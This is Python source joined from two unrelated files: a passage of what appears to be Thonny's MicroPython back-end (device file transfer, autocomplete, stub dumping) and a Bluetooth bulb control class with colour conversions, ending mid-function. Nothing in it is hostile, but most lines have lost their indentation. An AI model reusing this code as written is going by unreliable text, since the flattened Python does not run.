upload_items = []
for file in local_files:
# compute filenames (and subdirs) in target_dir
# relative to the context of the user selected items
assert file["path"].startswith(file["original_context"])
path_suffix = file["path"][len(file["original_context"]) :].strip("/").strip("\\")
target_path = self._join_remote_path_parts(target_dir, to_remote_path(path_suffix))
upload_items.append(dict(source=file["path"], target=target_path, size=file["size"]))
if not cmd["allow_overwrite"]:
targets = [item["target"] for item in upload_items]
existing_files = self._get_existing_remote_files(targets)
if existing_files:
return {
"existing_files": existing_files,
"source_paths": cmd["source_paths"],
"target_dir": cmd["target_dir"],
"description": cmd["description"],
}
total_size = sum([item["size"] for item in upload_items])
def notify(current_file_progress):
self._check_send_inline_progress(
cmd, completed_files_size + current_file_progress, total_size
)
# replace the indeterminate progressbar with determinate as soon as possible
notify(0)
for item in upload_items:
written_bytes = self._upload_file(item["source"], item["target"], notify)
assert written_bytes == item["size"]
completed_files_size += item["size"]
def _cmd_mkdir(self, cmd):
assert self._supports_directories()
assert cmd.path.startswith("/")
self._makedirs(cmd.path)
self._sync_all_filesystems()
def _cmd_editor_autocomplete(self, cmd):
# template for the response
result = dict(source=cmd.source, row=cmd.row, column=cmd.column)
try:
script = jedi.Script(cmd.source, cmd.row, cmd.column, sys_path=[self._api_stubs_path])
completions = script.completions()
result["completions"] = self._filter_completions(completions)
except Exception:
traceback.print_exc()
result["error"] = "Autocomplete error"
return result
def _filter_completions(self, completions):
# filter out completions not applicable to MicroPython
result = []
for completion in completions:
if completion.name.startswith("__"):
continue
if completion.parent() and completion.full_name:
parent_name = completion.parent().name
name = completion.name
root = completion.full_name.split(".")[0]
# jedi proposes names from CPython builtins
if root in self._builtins_info and name not in self._builtins_info[root]:
continue
if parent_name == "builtins" and name not in self._builtins_info:
continue
result.append({"name": completion.name, "complete": completion.complete})
return result
def _cmd_shell_autocomplete(self, cmd):
source = cmd.source
# TODO: combine dynamic results and jedi results
if source.strip().startswith("import ") or source.strip().startswith("from "):
# this needs the power of jedi
response = {"source": cmd.source}
try:
# at the moment I'm assuming source is the code before cursor, not whole input
lines = source.split("\n")
script = jedi.Script(
source, len(lines), len(lines[-1]), sys_path=[self._api_stubs_path]
)
completions = script.completions()
response["completions"] = self._filter_completions(completions)
except Exception:
traceback.print_exc()
response["error"] = "Autocomplete error"
return response
else:
# use live data
match = re.search(
r"(\w+\.)*(\w+)?$", source
) # https://github.com/takluyver/ubit_kernel/blob/master/ubit_kernel/kernel.py
if match:
prefix = match.group()
if "." in prefix:
obj, prefix = prefix.rsplit(".", 1)
names = self._evaluate(
"dir({}) if '{}' in locals() or '{}' in globals() else []".format(
obj, obj, obj
)
)
else:
names = self._evaluate("dir()")
else:
names = []
prefix = ""
completions = []
# prevent TypeError (iterating over None)
names = names if names else []
for name in names:
if name.startswith(prefix) and not name.startswith("__"):
completions.append({"name": name, "complete": name[len(prefix) :]})
return {"completions": completions, "source": source}
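    # A hedged walk-through of the live-data branch above, assuming a MicroPython
    # session where "import machine" has already been executed on the device:
    #
    #   cmd.source == "machine.fre"
    #   regex match -> prefix == "machine.fre" -> obj == "machine", prefix == "fre"
    #   dir(machine) evaluated on the device contains "freq", which survives the
    #   startswith("fre") filter, so the reply includes {"name": "freq", "complete": "q"}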
def _cmd_dump_api_info(self, cmd):
"For use during development of the plug-in"
self._execute(
dedent(
"""
def __get_object_atts(obj):
result = []
errors = []
for name in dir(obj):
try:
val = getattr(obj, name)
result.append((name, repr(val), repr(type(val))))
except BaseException as e:
errors.append("Couldn't get attr '%s' from object '%r', Err: %r" % (name, obj, e))
return (result, errors)
"""
)
)
for module_name in sorted(self._fetch_builtin_modules()):
if (
not module_name.startswith("_")
and not module_name.startswith("adafruit")
# and not module_name == "builtins"
):
file_name = os.path.join(
self._api_stubs_path, module_name.replace(".", "/") + ".py"
)
self._dump_module_stubs(module_name, file_name)
def _dump_module_stubs(self, module_name, file_name):
out, err, __ = self._execute("import {0}".format(module_name), capture_output=True)
if out or err:
print("FAILED IMPORTING MODULE:", module_name, "\nErr: " + out + err)
return
os.makedirs(os.path.dirname(file_name), exist_ok=True)
with io.open(file_name, "w", encoding="utf-8", newline="\n") as fp:
if module_name not in [
"webrepl",
"_webrepl",
"gc",
"http_client",
"http_client_ssl",
"http_server",
"framebuf",
"example_pub_button",
"flashbdev",
]:
self._dump_object_stubs(fp, module_name, "")
def _dump_object_stubs(self, fp, object_expr, indent):
if object_expr in [
"docs.conf",
"pulseio.PWMOut",
"adafruit_hid",
"upysh",
# "webrepl",
# "gc",
# "http_client",
# "http_server",
]:
print("SKIPPING problematic name:", object_expr)
return
print("DUMPING", indent, object_expr)
items, errors = self._evaluate("__get_object_atts({0})".format(object_expr))
if errors:
print("ERRORS", errors)
for name, rep, typ in sorted(items, key=lambda x: x[0]):
if name.startswith("__"):
continue
print("DUMPING", indent, object_expr, name)
self._send_text_to_shell(" * " + name + " : " + typ, "stdout")
if typ in ["<class 'function'>", "<class 'bound_method'>"]:
fp.write(indent + "def " + name + "():\n")
fp.write(indent + " pass\n\n")
elif typ in ["<class 'str'>", "<class 'int'>", "<class 'float'>"]:
fp.write(indent + name + " = " + rep + "\n")
elif typ == "<class 'type'>" and indent == "":
# full expansion only on toplevel
fp.write("\n")
fp.write(indent + "class " + name + ":\n") # What about superclass?
fp.write(indent + " ''\n")
self._dump_object_stubs(fp, "{0}.{1}".format(object_expr, name), indent + " ")
else:
# keep only the name
fp.write(indent + name + " = None\n")
def _read_file(self, path):
# TODO: read from mount when possible
# file_size = self._get_file_size(path)
block_size = 512
self._execute_without_output("__thonny_fp = open(%r, 'rb')" % path)
if "binascii" in self._builtin_modules:
self._execute_without_output("from binascii import hexlify as __temp_hexlify")
while True:
self._check_for_interrupt("local")
if "binascii" in self._builtin_modules:
block = binascii.unhexlify(
self._evaluate("__temp_hexlify(__thonny_fp.read(%s))" % block_size)
)
else:
block = self._evaluate("__thonny_fp.read(%s)" % block_size)
if block:
yield block
if len(block) < block_size:
break
self._execute_without_output(
dedent(
"""
__thonny_fp.close()
del __thonny_fp
try:
del __temp_hexlify
except:
pass
"""
)
)
def _write_file(self, content_blocks, target_path, notifier=None):
try:
result = self._write_file_via_serial(content_blocks, target_path, notifier)
except ReadOnlyFilesystemError:
result = self._write_file_via_mount(content_blocks, target_path, notifier)
self._sync_all_filesystems()
return result
def _write_file_via_mount(self, content_blocks, target_path, notifier=None):
mounted_target_path = self._internal_path_to_mounted_path(target_path)
with open(mounted_target_path, "wb") as f:
bytes_written = 0
for block in content_blocks:
self._check_for_interrupt("local")
bytes_written += f.write(block)
f.flush()
os.fsync(f)
if notifier is not None:
notifier(bytes_written)
return bytes_written
def _write_file_via_serial(self, content_blocks, target_path, notifier=None):
# prelude
try:
_, err, _ = self._execute(
dedent(
"""
__thonny_path = '{path}'
__thonny_written = 0
__thonny_fp = open(__thonny_path, 'wb')
"""
).format(path=target_path),
capture_output=True,
)
if "readonly" in err.replace("-", "").lower():
raise ReadOnlyFilesystemError()
elif err:
raise RuntimeError("Problem opening file for writing: " + err)
# Define function to allow shorter write commands
if "binascii" in self._builtin_modules:
self._execute_without_output(
dedent(
"""
from binascii import unhexlify as __thonny_unhex
def __W(x):
global __thonny_written
__thonny_written += __thonny_fp.write(__thonny_unhex(x))
__thonny_fp.flush()
"""
)
)
else:
self._execute_without_output(
dedent(
"""
def __W(x):
global __thonny_written
__thonny_written += __thonny_fp.write(x)
"""
)
)
bytes_sent = 0
for block in content_blocks:
self._check_for_interrupt("local")
if "binascii" in self._builtin_modules:
script = "__W(%r)" % binascii.hexlify(block)
else:
script = "__W(%r)" % block
self._execute_without_output(script)
bytes_sent += len(block)
if notifier is not None:
notifier(bytes_sent)
bytes_received = self._evaluate("__thonny_written")
if bytes_received != bytes_sent:
raise UserError(
"Expected %d written bytes but wrote %d" % (bytes_sent, bytes_received)
)
finally:
# clean up
self._execute(
dedent(
"""
try:
del __W
del __thonny_written
del __thonny_path
__thonny_fp.close()
del __thonny_fp
del __thonny_unhex
except:
pass
"""
)
)
return bytes_sent
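    # Hedged illustration of what the helper above sends for one block, assuming
    # binascii is available and block == b"abc":
    #
    #   binascii.hexlify(b"abc") == b"616263"
    #   script == "__W(b'616263')"
    #
    # i.e. the data travels as hex text and is unhexlified back on the device.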
def _sync_all_filesystems(self):
self._execute_without_output(
dedent(
"""
try:
from os import sync as __thonny_sync
__thonny_sync()
del __thonny_sync
except ImportError:
pass
"""
)
)
def _list_local_files_with_info(self, paths):
def rec_list_with_size(path):
result = {}
if os.path.isfile(path):
result[path] = os.path.getsize(path)
elif os.path.isdir(path):
for name in os.listdir(path):
result.update(rec_list_with_size(os.path.join(path, name)))
else:
raise RuntimeError("Can't process " + path)
return result
result = []
for requested_path in paths:
sizes = rec_list_with_size(requested_path)
for path in sizes:
result.append(
{
"path": path,
"size": sizes[path],
"original_context": os.path.dirname(requested_path),
}
)
result.sort(key=lambda rec: rec["path"])
return result
def _list_remote_files_with_info(self, paths):
# prepare universal functions
self._execute_without_output(
dedent(
"""
try:
import os as __thonny_os
from os import stat as __thonny_stat
def __thonny_getsize(path):
return __thonny_stat(path)[6]
def __thonny_isdir(path):
return __thonny_stat(path)[0] & 0o170000 == 0o040000
except ImportError:
__thonny_stat = None
# micro:bit
from os import size as __thonny_getsize
def __thonny_isdir(path):
return False
"""
)
)
self._execute_without_output(
dedent(
"""
def __thonny_rec_list_with_size(path):
result = {}
if __thonny_isdir(path):
for name in __thonny_os.listdir(path):
result.update(__thonny_rec_list_with_size(path + "/" + name))
else:
result[path] = __thonny_getsize(path)
return result
"""
)
)
result = []
for requested_path in paths:
sizes = self._evaluate("__thonny_rec_list_with_size(%r)" % requested_path)
for path in sizes:
result.append(
{
"path": path,
"size": sizes[path],
"original_context": os.path.dirname(requested_path),
}
)
result.sort(key=lambda rec: rec["path"])
self._execute_without_output(
dedent(
"""
del __thonny_os
del __thonny_stat
del __thonny_getsize
del __thonny_isdir
del __thonny_rec_list_with_size
"""
)
)
return result
def _get_existing_remote_files(self, paths):
if self._supports_directories():
func = "stat"
else:
func = "size"
return self._evaluate(
"__thonny_result",
prelude=dedent(
"""
import os as __thonny_os
__thonny_result = []
for __thonny_path in %r:
try:
__thonny_os.%s(__thonny_path)
__thonny_result.append(__thonny_path)
except OSError:
pass
"""
)
% (paths, func),
cleanup=dedent(
"""
del __thonny_os
del __thonny_result
del __thonny_path
"""
),
)
def _join_remote_path_parts(self, left, right):
if left == "": # micro:bit
assert not self._supports_directories()
return right.strip("/")
return left.rstrip("/") + "/" + right.strip("/")
def _get_file_size(self, path):
if self._supports_directories():
script = "__thonny_os.stat(%r)[6]"
        else:
            # micro:bit's os module has no stat(); it exposes size() instead,
            # and only __thonny_os is defined by the prelude below
            script = "__thonny_os.size(%r)"
return self._evaluate(script % path, prelude="import os as __thonny_os")
    def _makedirs(self, path):
        if path == "/":
            return
        try:
            self._makedirs_via_serial(path)
        except Exception as e:
            if "read-only" in str(e).lower():
                self._makedirs_via_mount(path)
            else:
                # don't silently swallow unrelated errors
                raise
def _makedirs_via_mount(self, path):
mounted_path = self._internal_path_to_mounted_path(path)
assert mounted_path is not None, "Couldn't find mounted path for " + path
os.makedirs(mounted_path, exist_ok=True)
def _makedirs_via_serial(self, path):
if path == "/":
return
path = path.rstrip("/")
script = (
dedent(
"""
import os as __thonny_os
__thonny_parts = %r.split('/')
for i in range(2, len(__thonny_parts) + 1):
__thonny_path = "/".join(__thonny_parts[:i])
try:
__thonny_os.stat(__thonny_path)
except OSError:
# does not exist
__thonny_os.mkdir(__thonny_path)
del __thonny_parts
try:
del __thonny_path
except:
pass
"""
)
% path
)
self._execute_without_output(script)
def _delete_via_mount(self, paths):
for path in paths:
mounted_path = self._internal_path_to_mounted_path(path)
assert mounted_path is not None
shutil.rmtree(mounted_path)
def _delete_via_serial(self, paths):
if not self._supports_directories():
self._execute_without_output(
dedent(
"""
import os as __thonny_os
for __thonny_path in %r:
__thonny_os.remove(__thonny_path)
del __thonny_path
del __thonny_os
"""
)
% paths
)
else:
self._execute_without_output(
dedent(
"""
import os as __thonny_os
def __thonny_delete(path):
if __thonny_os.stat(path)[0] & 0o170000 == 0o040000:
for name in __thonny_os.listdir(path):
child_path = path + "/" + name
__thonny_delete(child_path)
__thonny_os.rmdir(path)
else:
__thonny_os.remove(path)
for __thonny_path in %r:
__thonny_delete(__thonny_path)
del __thonny_path
del __thonny_delete
del __thonny_os
"""
)
% paths
)
def _upload_file(self, source, target, notifier):
assert target.startswith("/") or not self._supports_directories()
target_dir, _ = linux_dirname_basename(target)
assert target_dir.startswith("/") or not self._supports_directories()
self._makedirs(target_dir)
def block_generator():
with open(source, "rb") as source_fp:
while True:
block = source_fp.read(512)
if block:
yield block
else:
break
return self._write_file(block_generator(), target, notifier=notifier)
    def _download_file(self, source, target, notifier=None):
        os.makedirs(os.path.dirname(target), exist_ok=True)
        bytes_written = 0
        with open(target, "wb") as out_fp:
            for block in self._read_file(source):
                out_fp.write(block)
                out_fp.flush()
                os.fsync(out_fp)
                bytes_written += len(block)
                if notifier is not None:
                    notifier(bytes_written)
        return bytes_written
def _get_fs_mount_label(self):
# This method is most likely required with CircuitPython,
# so try its approach first
# https://learn.adafruit.com/welcome-to-circuitpython/the-circuitpy-drive
result = self._evaluate(
"__thonny_result",
prelude=dedent(
"""
try:
from storage import getmount as __thonny_getmount
try:
__thonny_result = __thonny_getmount("/").label
finally:
del __thonny_getmount
except ImportError:
__thonny_result = None
except OSError:
__thonny_result = None
"""
),
cleanup="del __thonny_result",
)
if result is not None:
return result
if self._welcome_text is None:
return None
"""
# following is not reliable and probably not needed
markers_by_name = {"PYBFLASH": {"pyb"}, "CIRCUITPY": {"circuitpython"}}
for name in markers_by_name:
for marker in markers_by_name[name]:
if marker.lower() in self._welcome_text.lower():
return name
"""
return None
def _get_flash_prefix(self):
if not self._supports_directories():
return ""
elif (
"LoBo" in self._welcome_text
or "WiPy with ESP32" in self._welcome_text
or "PYBLITE" in self._welcome_text
or "PYBv" in self._welcome_text
or "PYBOARD" in self._welcome_text.upper()
):
return "/flash/"
else:
return "/"
def _get_fs_mount(self):
label = self._get_fs_mount_label()
if label is None:
return None
else:
            candidates = find_volumes_by_name(
                label,
                # querying A can be very slow
                skip_letters="A",
            )
            if len(candidates) == 0:
                raise RuntimeError("Could not find volume " + label)
elif len(candidates) > 1:
raise RuntimeError("Found several possible mount points: %s" % candidates)
else:
return candidates[0]
def _get_fs_info(self, path):
result = self._evaluate(
dedent(
"""{
"total" : __thonny_total,
"used" : __thonny_used,
"free": __thonny_free,
"sizes": __thonny_sizes
}"""
),
prelude=dedent(
"""
try:
from os import statvfs as __thonny_statvfs
__thonny_stat = __thonny_statvfs(%r)
__thonny_total = __thonny_stat[2] * __thonny_stat[0]
__thonny_free = __thonny_stat[3] * __thonny_stat[0]
__thonny_used = __thonny_total - __thonny_free
__thonny_sizes = None
del __thonny_statvfs
del __thonny_stat
except ImportError:
import os as __thonny_os
__thonny_sizes = [__thonny_os.size(name) for name in __thonny_os.listdir()]
__thonny_used = None
__thonny_total = None
__thonny_free = None
del __thonny_os
"""
)
% path,
cleanup=dedent(
"""
del __thonny_total
del __thonny_free
del __thonny_used
del __thonny_sizes
"""
),
)
if result["sizes"] is not None:
if self._connected_to_microbit():
comment = "Assuming around 30 kB of storage space for user files."
else:
comment = "Don't know the size of storage space on this device."
files_total_size = sum(result["sizes"])
# TODO: compute number of used blocks
if files_total_size > 0:
comment += "\n\n" + "At least %s of it is used by %d file(s)." % (
sizeof_fmt(files_total_size),
len(result["sizes"]),
)
result["comment"] = comment
del result["sizes"]
return result
def _get_microbit_file_sizes(self):
return self._evaluate(
"{name : __thonny_os.size(name) for name in __thonny_os.listdir()}",
prelude="import os as __thonny_os",
cleanup="del __thonny_os",
)
def _get_dirs_child_data_generic(self, paths):
return self._evaluate(
"__thonny_result",
prelude=dedent(
"""
import os as __thonny_os
# Init all vars, so that they can be deleted
# even if the loop makes no iterations
__thonny_result = {}
__thonny_path = None
__thonny_st = None
__thonny_child_names = None
__thonny_children = None
__thonny_name = None
__thonny_real_path = None
__thonny_full = None
for __thonny_path in %(paths)r:
__thonny_real_path = __thonny_path or '/'
try:
__thonny_child_names = __thonny_os.listdir(__thonny_real_path)
except OSError:
# probably deleted directory
__thonny_children = None
else:
__thonny_children = {}
for __thonny_name in __thonny_child_names:
if __thonny_name.startswith('.') or __thonny_name == "System Volume Information":
continue
__thonny_full = (__thonny_real_path + '/' + __thonny_name).replace("//", "/")
try:
__thonny_st = __thonny_os.stat(__thonny_full)
if __thonny_st[0] & 0o170000 == 0o040000:
# directory
__thonny_children[__thonny_name] = {"kind" : "dir", "size" : None}
else:
__thonny_children[__thonny_name] = {"kind" : "file", "size" :__thonny_st[6]}
# converting from 2000-01-01 epoch to Unix epoch
__thonny_children[__thonny_name]["time"] = max(__thonny_st[8], __thonny_st[9]) + 946684800
except OverflowError:
# Probably "System Volume Information" in trinket
# https://github.com/thonny/thonny/issues/923
pass
__thonny_result[__thonny_path] = __thonny_children
"""
)
% {"paths": paths},
cleanup=dedent(
"""
del __thonny_os
del __thonny_st
del __thonny_children
del __thonny_name
del __thonny_path
del __thonny_full
del __thonny_result
del __thonny_real_path
"""
),
)
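    # Sanity check for the 946684800 constant used above (hedged, for reference only):
    # it is the number of seconds between the Unix epoch (1970-01-01) and the
    # embedded 2000-01-01 epoch. On CPython:
    #
    #   import datetime
    #   delta = datetime.datetime(2000, 1, 1) - datetime.datetime(1970, 1, 1)
    #   assert int(delta.total_seconds()) == 946684800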
def _check_for_connection_errors(self):
self._connection._check_for_error()
def _on_connection_closed(self, error=None):
message = "Connection lost"
if error:
message += " (" + str(error) + ")"
self._send_output("\n" + message + "\n", "stderr")
self._send_output("\n" + "Use Stop/Restart to reconnect." + "\n", "stderr")
sys.exit(EXPECTED_TERMINATION_CODE)
def _show_error(self, msg):
self._send_output(msg + "\n", "stderr")
class ExecutionError(Exception):
pass
def _report_internal_error():
print("PROBLEM WITH THONNY'S BACK-END:\n", file=sys.stderr)
traceback.print_exc()
def parse_api_information(file_path):
with tokenize.open(file_path) as fp:
source = fp.read()
tree = ast.parse(source)
defs = {}
# TODO: read also docstrings ?
for toplevel_item in tree.body:
if isinstance(toplevel_item, ast.ClassDef):
class_name = toplevel_item.name
member_names = []
for item in toplevel_item.body:
if isinstance(item, ast.FunctionDef):
member_names.append(item.name)
elif isinstance(item, ast.Assign):
# TODO: check Python 3.4
"TODO: item.targets[0].id"
defs[class_name] = member_names
return defs
def linux_dirname_basename(path):
if path == "/":
return ("/", "")
if "/" not in path: # micro:bit
return "", path
path = path.rstrip("/")
dir_, file_ = path.rsplit("/", maxsplit=1)
if dir_ == "":
dir_ = "/"
return dir_, file_
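# A few illustrative calls (hedged, derived from the branches above):
#
#   linux_dirname_basename("/")             -> ("/", "")
#   linux_dirname_basename("boot.py")       -> ("", "boot.py")      # micro:bit style
#   linux_dirname_basename("/flash/lib/a")  -> ("/flash/lib", "a")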
def to_remote_path(path):
return path.replace("\\", "/")
class ReadOnlyFilesystemError(RuntimeError):
pass
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--clean", type=lambda s: True if s == "True" else False)
parser.add_argument("--port", type=str)
parser.add_argument("--url", type=str)
parser.add_argument("--password", type=str)
parser.add_argument("--api_stubs_path", type=str)
parser.add_argument("--min_write_delay", type=float, default=0.01)
args = parser.parse_args()
port = None if args.port == "None" else args.port
try:
if port is None:
# remain busy
while True:
time.sleep(1000)
elif port == "webrepl":
from thonny.plugins.micropython.webrepl_connection import WebReplConnection
connection = WebReplConnection(args.url, args.password, args.min_write_delay)
else:
from thonny.plugins.micropython.serial_connection import SerialConnection
connection = SerialConnection(port, BAUDRATE)
vm = MicroPythonBackend(connection, clean=args.clean, api_stubs_path=args.api_stubs_path)
except ConnectionFailedException as e:
text = "\n" + str(e) + "\n"
msg = BackendEvent(event_type="ProgramOutput", stream_name="stderr", data=text)
sys.stdout.write(serialize_message(msg) + "\n")
sys.stdout.flush()
|
bulb.py
|
import bluetooth, math, time, threading, logging
class BluetoothBulb:
def __init__(self, mac_address, name):
self.__mac_address = mac_address
self.__name = name
self.__sock = None
self.__socket_lock = threading.Lock()
self.__heartbeat_running = False
self.__heartbeat_thread = None
self.__is_power = None
self.__is_color = None
self.__current_brightness = None
self.__current_color = None
def is_connected(self):
return (self.__sock is not None)
def get_name(self):
return self.__name
def get_mac_address(self):
return self.__mac_address
def is_powered_on(self):
return self.__is_power
def is_color_mode(self):
return self.__is_color
# returns current lamp brightness. range is [1, 16]
def get_brightness(self):
return self.__current_brightness
# returns tuple (r, g, b) with current lamp color
def get_color_rgb(self):
return self.__current_color
# see https://en.wikipedia.org/wiki/HSL_and_HSV
def __rgb_to_hsv(self, r, g, b):
(r_, g_, b_) = (r/255, g/255, b/255)
c_max = max(r_, g_, b_)
c_min = min(r_, g_, b_)
delta_c = c_max - c_min
hue = 0
if delta_c != 0 and c_max == r_:
hue = 60 * (((g_-b_)/delta_c) % 6)
elif delta_c != 0 and c_max == g_:
hue = 60 * (((b_-r_)/delta_c) + 2)
elif delta_c != 0 and c_max == b_:
hue = 60 * (((r_-g_)/delta_c) + 4)
sat = 0
if c_max != 0:
sat = delta_c / c_max
val = c_max
return (hue, sat, val)
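    # Quick worked examples for the conversion above (hedged, values rounded):
    #
    #   __rgb_to_hsv(255, 0, 0)  -> (0.0, 1.0, 1.0)     pure red
    #   __rgb_to_hsv(0, 255, 0)  -> (120.0, 1.0, 1.0)   pure green
    #   __rgb_to_hsv(0, 0, 128)  -> (240.0, 1.0, ~0.5)  dark blue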
# returns tuple (hue, sat, val) with current lamp color
def get_color_hsv(self):
(r, g, b) = self.get_color_rgb()
return self.__rgb_to_hsv(r, g, b)
# calculates __current_brightness from (r, g, b) color
# and sets __current_color to (r, g, b) at maximum intensity
def __set_normalized_color_brightness(self, r, g, b):
brightness = max(r, g, b, 1)
if brightness == 255:
self.__current_brightness = 16
self.__current_color = (r, g, b)
else:
self.__current_brightness = math.ceil(brightness / 16)
self.__current_color = \
(math.ceil(round(r * 255 / brightness, 0)), \
math.ceil(round(g * 255 / brightness, 0)), \
math.ceil(round(b * 255 / brightness, 0)))
def __send_hex_string(self, bulb_function, data):
with self.__socket_lock:
try:
logging.debug('Sending function %02x - data %s' % (bulb_function, data))
hex_string = '01fe000051%02x' % bulb_function # 01fe0000 + 51 (write) + function code
length = int(len(data) / 2) + 7
hex_string = '%s%02x%s' % (hex_string, length, data)
self.__sock.send(bluetooth.binascii.unhexlify(hex_string))
logging.debug('Receiving answer')
header = self.__sock.recv(6) # 01fe0000 + 41 (read) + function code
logging.debug(' header = %s' % bluetooth.binascii.hexlify(header))
length = self.__sock.recv(1) # length
logging.debug(' length = %d' % length[0])
data = self.__sock.recv(length[0] - 7) # data
logging.debug(' data = %s' % bluetooth.binascii.hexlify(data))
except:
self.__sock.close()
self.__sock = None
return data
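    # Frame layout, as far as it can be inferred from the code above (hedged):
    #
    #   01fe0000 | 51 (write) | <function> | <length> | <payload>
    #
    # e.g. the heartbeat call __send_hex_string(0x02, '000000008000000080') sends
    #   01fe0000 51 02 10 000000008000000080
    # where 0x10 == 16 is the total frame length in bytes (4 + 1 + 1 + 1 + 9).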
# Connects to the bulb at the given MAC address. Note that the bluetooth controller should be
# powered on and no other device should have a connection to the bulb.
def connect(self):
# search for SPP service
service_matches = bluetooth.find_service(uuid='00001101-0000-1000-8000-00805F9B34FB', \
address=self.__mac_address)
if len(service_matches) > 0:
#if len(service_matches) > 1:
# logging.warning("More than 1 service found, continuing with the first service.")
first_match = service_matches[0]
name = first_match['name']
host = first_match['host']
port = first_match['port']
# Create the client socket
logging.info('Connecting to \'%s\' on %s port %s' % (name, host, port))
try:
self.__sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
self.__sock.connect((host, port))
self.__setup_connection()
except:
logging.error('Connection to %s failed' % self.__mac_address)
self.__sock = None
else:
logging.error('Couldn\'t find the SPP service.')
# Disconnects from the bulb.
def disconnect(self):
if self.__sock:
logging.info('Disconnecting')
self.__stop_heartbeat_thread()
self.__sock.close()
self.__sock = None
self.__is_power = None
self.__is_color = None
self.__current_brightness = None
self.__current_color = None
def __check_connection(func):
def wrapper(self, *args, **kargs):
if not self.__sock:
raise Exception('Need to connect first!')
return func(self, *args, **kargs)
return wrapper
@__check_connection
def __setup_connection(self):
logging.debug('Setup connection')
# ASCII 01234567
self.__sock.send(bluetooth.binascii.unhexlify('3031323334353637'))
self.__start_heartbeat_thread()
# read current color
self.__read_current_status()
        # we don't know the power state, turn it on to be sure
self.set_power(True)
# bulb function 0x00, TODO information is returned but its meaning is unclear
@__check_connection
def read_information_0x00(self):
return self.__send_hex_string(0x00, '000000008000000080')
# bulb function 0x02, heartbeat TODO information is returned but its meaning is unclear
    # The official app sends this about once a second, but it turns out not to be strictly necessary
#@__check_connection
def __heartbeat(self):
self.__heartbeat_running = True
while self.__heartbeat_running:
logging.debug('Heartbeat')
self.__send_hex_string(0x02, '000000008000000080')
time.sleep(1)
logging.debug('Heartbeat stopped')
def __start_heartbeat_thread(self):
logging.debug('Starting heartbeat')
if not self.__heartbeat_running:
self.__heartbeat_thread = threading.Thread(target=self.__heartbeat, args=())
self.__heartbeat_thread.start()
def __stop_heartbeat_thread(self):
logging.debug('Stopping heartbeat')
if self.__heartbeat_thread and self.__heartbeat_running:
self.__heartbeat_running = False
self.__heartbeat_thread.join()
# bulb function 0x80, read bulb identification
# At least the name of the device is returned and probably a version number as well, but the
# meaning of the other information is unclear
@__check_connection
def read_identification(self):
logging.debug('Read lamp information')
return self.__send_hex_string(0x80, '000000000000000000')
# bulb function 0x81, subfunction 0x00: read power and color status
@__check_connection
def __read_current_status(self):
data = self.__send_hex_string(0x81, '0000000000000000000d07010300000e')
logging.debug('Read color mode status: %s' % bluetooth.binascii.hexlify(data))
if data[14] == 0x01:
self.__is_color = False
self.__current_brightness = data[15] # range 0-16
self.__current_color = (0xff, 0xff, 0xff)
elif data[14] == 0x02:
data = self.__send_hex_string(0x81, '0000000000000000000d07020300000e')
logging.debug('Read color status: %s' % bluetooth.binascii.hexlify(data))
self.__is_color = True
self.__set_normalized_color_brightness(data[16], data[17], data[18])
logging.info('Mode is %s' % ('color' if self.__is_color else 'yellow/white'))
logging.info('Brightness is %d' % self.__current_brightness)
logging.info('Color is %02x%02x%02x' % self.__current_color)
# bulb function 0x81, subfunction 0x01: write power and color status
@__check_connection
def set_power(self, is_power):
logging.debug('Set power %s' % ('on' if is_power else 'off'))
if self.__is_power is None or self.__is_power != is_power:
self.__send_hex_string(0x81, '0000000000000000000d07%s0301%s0e' % \
('02' if self.__is_color else '01', \
'01' if is_power else '02'))
self.__is_power = is_power
# bulb function 0x81, subfunction 0x01: write power and color status
@__check_connection
def set_color_mode(self, is_color):
logging.debug('Switch to %s' % ('color mode' if is_color else 'white/yellow mode'))
if self.__is_color is None or self.__is_color != is_color:
self.__send_hex_string(0x81, '0000000000000000000d07%s0301%s0e' % \
('02' if is_color else '01', \
'01' if self.__is_power else '02'))
self.__is_color = is_color
# bulb function 0x81, subfunction 0x02: set brightness
@__check_connection
def set_brightness(self, brightness):
logging.debug('Set brightness to %s' % brightness)
if not self.__is_color:
self.__send_hex_string(0x81, '0000000000000000000d07010302%02x0e' % brightness)
self.__current_brightness = brightness
else:
(r, g, b) = self.__current_color
r_ = int(round(r * brightness / 16, 0))
g_ = int(round(g * brightness / 16, 0))
b_ = int(round(b * brightness / 16, 0))
self.set_color_rgb(r_, g_, b_)
# bulb function 0x81, subfunction 0x03: set color
@__check_connection
def set_color_rgb(self, r, g, b):
logging.debug('Set color to %02x%02x%02x' % (r, g, b))
self.__send_hex_string(0x81, '0000000000000000000d0a020303%02x%02x%02x000e' % (r, g, b))
self.__is_color = True
self.__set_normalized_color_brightness(r, g, b)
# see https://en.wikipedia.org/wiki/HSL_and_HSV
def __hsv_to_rgb(self, hue, sat, val):
c = val * sat
x = c * (1 - abs(((hue/60.0) % 2) - 1))
m = val - c
(r_, g_, b_) = (0, 0, 0)
if 0 <= hue < 60:
(r_, g_, b_) = (c, x, 0)
elif 60 <= hue < 120:
(r_, g_, b_) = (x, c, 0)
elif 120 <= hue < 180:
(r_, g_, b_) = (0, c, x)
elif 180 <= hue < 240:
(r_, g_, b_) = (0, x, c)
elif 240 <= hue < 300:
(r_, g_, b_) = (x, 0, c)
elif 300 <= hue < 360:
(r_, g_, b_) = (c, 0, x)
(r, g, b) = \
(int(round((r_+m)*255, 0)), \
int(round((g_+m)*255, 0)), \
int(round((b_+m)*255, 0)))
return (r, g, b)
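    # Quick worked examples for the conversion above (hedged):
    #
    #   __hsv_to_rgb(0, 1.0, 1.0)    -> (255, 0, 0)  pure red
    #   __hsv_to_rgb(120, 1.0, 1.0)  -> (0, 255, 0)  pure green
    #   __hsv_to_rgb(240, 1.0, 0.5)  -> (0, 0, 128)  dark blue at half value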
    # 0 <= hue < 360, saturation is fixed at 1.0, 1 <= brightness <= 16
    @__check_connection
    def set_color_hsv(self, hue, brightness):
        sat = 1.0  # saturation values below 0.7 are pointless, they always result in near-white
        val = brightness / 16
        (r, g, b) = self.__hsv_to_rgb(hue, sat, val)
self.set_color_rgb(r, g, b)
# see https://tannerhelland.com/2012/09/18/convert-temperature-rgb-algorithm-code.html
    # temperature range is [1000, 40000], but the interesting red-to-white range is [1500, 6600]
def __temp_to_rgb(self, temperature, brightness):
t = min(40000, max(1000, temperature)) / 100 # constrain to [1000, 40000] and divide by 100
# red
r = 255
if t > 66:
r = t - 60
r = 329.698727446 * pow(r, -0.1332047592)
r = min(255, max(0, r)) # constrain to [0, 255]
# green
g = 255
if t <= 66:
g = t
